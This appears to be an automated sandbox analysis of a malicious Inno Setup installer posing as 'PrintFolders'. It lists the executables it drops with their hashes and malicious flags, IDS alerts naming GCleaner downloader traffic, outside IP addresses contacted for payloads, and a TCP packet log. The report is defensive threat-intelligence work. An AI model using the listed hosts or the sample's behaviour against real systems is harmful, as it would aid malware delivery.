                Preview:Inno Setup Uninstall Log (b)....................................{3C248D7A-78F2-476F-86FF-34610A9B2E85}}.........................................................................................PrintFolders....................................................................................................................*...........%.................................................................................................................u........n:........C....320366.user#C:\Program Files (x86)\PrintFolders.................. ..........Q.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):714506
                Entropy (8bit):6.488639273564823
                Encrypted:false
                SSDEEP:12288:Ih5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOZ:q5NoqWolrP837JzHvA6yknyWFxvVxOZ
                MD5:F82EF8A460249A7A71B8DA396C651027
                SHA1:1BA036C9860EB581550998DA24980CC63CD7E2C9
                SHA-256:B7B477D0DE6348FAEA68869B86782B2859AC302A0DFE5C91B94CE65CFAD31218
                SHA-512:F331C2149313896A37AD0F268EB83EFF75B1A65EE1372185F02558F49BB4E0DE2BF9565D93DEF6A0009D37A2CDC297CC14108629CDBE168FDDA202470BEBE31A
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:data
                Category:dropped
                Size (bytes):94224
                Entropy (8bit):7.998072640845361
                Encrypted:true
                SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                MD5:418619EA97671304AF80EC60F5A50B62
                SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                Malicious:false
                Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):17
                Entropy (8bit):3.1751231351134614
                Encrypted:false
                SSDEEP:3:nCmxEl:Cmc
                MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                Malicious:false
                Preview:UwUoooIIrwgh24uuU
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:V:V
                MD5:CFCD208495D565EF66E7DFF9F98764DA
                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                Malicious:false
                Preview:0
                Process:C:\Users\user\Desktop\file.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):704000
                Entropy (8bit):6.478833170287182
                Encrypted:false
                SSDEEP:12288:gh5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvo6xOM:y5NoqWolrP837JzHvA6yknyWFxvVxOM
                MD5:2C3832FDF847813369EC960CD39C8265
                SHA1:35B24C0B451E987C1E2B07B670A65FBCB02B118C
                SHA-256:2820D4BDBD9CAB3EEE82C86B11CFB2B8EC55247BCB975331078ECD182C1471B2
                SHA-512:408A642264E967AAA78CC7B58529AAA152BA85AF12A4DC7DBA0A82E560E08299031CB45D8DE78E5FA26F03FC6DB863344AAA68E010F7DDDA4FC29501365D986A
                Malicious:true
                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................t.............@..............................................@..............................$%...........................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):2560
                Entropy (8bit):2.8818118453929262
                Encrypted:false
                SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                MD5:A69559718AB506675E907FE49DEB71E9
                SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32+ executable (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):4608
                Entropy (8bit):4.226829458093667
                Encrypted:false
                SSDEEP:48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
                MD5:9E5BA8A0DB2AE3A955BEE397534D535D
                SHA1:EF08EF5FAC94F42C276E64765759F8BC71BF88CB
                SHA-256:08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
                SHA-512:229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\AppData\Local\Temp\is-2JDIE.tmp\is-I19BM.tmp
                File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):23312
                Entropy (8bit):4.596242908851566
                Encrypted:false
                SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 2%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\PrintFolders\ntFolders.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):73728
                Entropy (8bit):6.20389308045717
                Encrypted:false
                SSDEEP:1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
                MD5:3FB36CB0B7172E5298D2992D42984D06
                SHA1:439827777DF4A337CBB9FA4A4640D0D3FA1738B7
                SHA-256:27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
                SHA-512:6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................
                File type:PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
                Entropy (8bit):7.986537727068986
                TrID:
                • Win32 Executable (generic) a (10002005/4) 98.88%
                • Inno Setup installer (109748/4) 1.08%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:2460138
                MD5:71f3a21ccd6e54f8178d3fb65f4849b9
                SHA1:b24f88c179a8e0777bffbcc4c9f969fb4d32d148
                SHA256:7dbb8aa3f00f0f0d24acf0b1bdb73d05f422e90fd46c2a6fed0b44fe9a0a721a
                SHA512:e1aaf1fc9dad13243ff435730a215bcd45b8e026e55d9fd38be74cef81b213ce56c33ac00b46c3707e048a1e4b3de788f7f236121406866b0f8786e9ec6c5626
                SSDEEP:49152:aGoOZy1S1FBih4gcjlZZQPTbncg1Gk1QBfEkULNQ69Z3yS8/5csoZBZH:aGoOZcS1FBih4TrYrcg1Z1UfGL2gZiS3
                TLSH:08B533C7F884C63DFD6851745E7BA17100F82CFC2E20582E27ECBF9B5276441695AB29
                File Content Preview:MZP.....................@.......................Inno..%.=v..............!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:ecccdac6c6c6d464
                Entrypoint:0x40968c
                Entrypoint Section:CODE
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:1
                OS Version Minor:0
                File Version Major:1
                File Version Minor:0
                Subsystem Version Major:1
                Subsystem Version Minor:0
                Import Hash:da86ff6d22d7419ae7f10724a403dffd
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFD4h
                push ebx
                push esi
                push edi
                xor eax, eax
                mov dword ptr [ebp-10h], eax
                mov dword ptr [ebp-1Ch], eax
                call 00007F3280C36F8Fh
                call 00007F3280C3823Ah
                call 00007F3280C3A42Dh
                call 00007F3280C3A474h
                call 00007F3280C3C9C3h
                call 00007F3280C3CAB2h
                mov esi, 0040BDE0h
                xor eax, eax
                push ebp
                push 00409D71h
                push dword ptr fs:[eax]
                mov dword ptr fs:[eax], esp
                xor edx, edx
                push ebp
                push 00409D27h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                mov eax, dword ptr [0040B014h]
                call 00007F3280C3D43Fh
                call 00007F3280C3CFFEh
                lea edx, dword ptr [ebp-10h]
                xor eax, eax
                call 00007F3280C3A8E8h
                mov edx, dword ptr [ebp-10h]
                mov eax, 0040BDD4h
                call 00007F3280C3703Bh
                push 00000002h
                push 00000000h
                push 00000001h
                mov ecx, dword ptr [0040BDD4h]
                mov dl, 01h
                mov eax, 004070C4h
                call 00007F3280C3AF4Bh
                mov dword ptr [0040BDD8h], eax
                xor edx, edx
                push ebp
                push 00409D05h
                push dword ptr fs:[edx]
                mov dword ptr fs:[edx], esp
                lea edx, dword ptr [ebp-18h]
                mov eax, dword ptr [0040BDD8h]
                call 00007F3280C3B023h
                mov ebx, dword ptr [ebp-18h]
                mov edx, 00000030h
                mov eax, dword ptr [0040BDD8h]
                call 00007F3280C3B15Dh
                mov edx, esi
                mov ecx, 0000000Ch
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xc0000x8c8.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000xd5a0.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xf0000x0.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xe0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                CODE0x10000x8e000x8e00False0.6218364876760564data6.600437911517656IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                DATA0xa0000x2480x400False0.3115234375data2.7204325510923035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                BSS0xb0000xe640x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xc0000x8c80xa00False0.389453125data4.2507970587946735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xd0000x80x0False0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xe0000x180x200False0.052734375data0.1991075177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .reloc0xf0000x86c0x0False0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                .rsrc0x100000xd5a00xd600False0.2876204731308411data5.7136247823841IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                NameRVASizeTypeLanguageCountry
                RT_ICON0x1042c0x1628Device independent bitmap graphic, 64 x 128 x 8, image size 4608EnglishUnited States
                RT_ICON0x11a540xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688EnglishUnited States
                RT_ICON0x128fc0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152EnglishUnited States
                RT_ICON0x131a40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 672EnglishUnited States
                RT_ICON0x1386c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 320EnglishUnited States
                RT_ICON0x13dd40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
                RT_ICON0x17ffc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                RT_ICON0x1a5a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                RT_ICON0x1b64c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                RT_ICON0x1bfd40x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                RT_STRING0x1c43c0x2f2data
                RT_STRING0x1c7300x30cdata
                RT_STRING0x1ca3c0x2cedata
                RT_STRING0x1cd0c0x68data
                RT_STRING0x1cd740xb4data
                RT_STRING0x1ce280xaedata
                RT_GROUP_ICON0x1ced80x92dataEnglishUnited States
                RT_VERSION0x1cf6c0x3a8dataEnglishUnited States
                RT_MANIFEST0x1d3140x289XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                DLLImport
                kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
                user32.dllMessageBoxA
                oleaut32.dllVariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
                kernel32.dllWriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SetLastError, SetFilePointer, SetEndOfFile, RemoveDirectoryA, ReadFile, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, InterlockedExchange, FormatMessageA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
                user32.dllTranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
                comctl32.dllInitCommonControls
                advapi32.dllAdjustTokenPrivileges
                Language of compilation systemCountry where language is spokenMap
                EnglishUnited States
                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                192.168.2.445.139.105.17149691802041920 12/09/22-11:02:15.223774TCP2041920ET TROJAN GCleaner Downloader Activity M84969180192.168.2.445.139.105.171
                107.182.129.235192.168.2.480496922852925 12/09/22-11:02:15.529889TCP2852925ETPRO TROJAN GCleaner Downloader - Payload Response8049692107.182.129.235192.168.2.4
                TimestampSource PortDest PortSource IPDest IP
                Dec 9, 2022 11:02:15.195147038 CET4969180192.168.2.445.139.105.171
                Dec 9, 2022 11:02:15.221927881 CET804969145.139.105.171192.168.2.4
                Dec 9, 2022 11:02:15.222026110 CET4969180192.168.2.445.139.105.171
                Dec 9, 2022 11:02:15.223773956 CET4969180192.168.2.445.139.105.171
                Dec 9, 2022 11:02:15.250996113 CET804969145.139.105.171192.168.2.4
                Dec 9, 2022 11:02:15.255343914 CET804969145.139.105.171192.168.2.4
                Dec 9, 2022 11:02:15.255431890 CET4969180192.168.2.445.139.105.171
                Dec 9, 2022 11:02:15.388844967 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.415699005 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.415824890 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.416578054 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.443360090 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.443711042 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.443802118 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.502656937 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.529623032 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.529889107 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.529921055 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.529939890 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.529963017 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.529979944 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.529989958 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530008078 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530031919 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530039072 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530055046 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530065060 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530072927 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530088902 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530102015 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530116081 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530126095 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530143023 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.530153036 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.530181885 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.556906939 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.556941032 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.556961060 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.556979895 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.556998968 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557018995 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557045937 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557063103 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557070017 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557089090 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557102919 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557116985 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557138920 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557147026 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557168961 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557174921 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557188988 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557203054 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557212114 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557228088 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557238102 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557254076 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557265997 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557281971 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557301998 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557308912 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557320118 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557336092 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557344913 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557370901 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557382107 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557404995 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557419062 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557444096 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.557455063 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.557491064 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584275961 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584310055 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584326982 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584348917 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584368944 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584376097 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584395885 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584414959 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584425926 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584441900 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584450006 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584460020 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584476948 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584486961 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584505081 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584513903 CET4969280192.168.2.4107.182.129.235
                Dec 9, 2022 11:02:15.584531069 CET8049692107.182.129.235192.168.2.4
                Dec 9, 2022 11:02:15.584539890 CET4969280192.168.2.4107.182.129.235
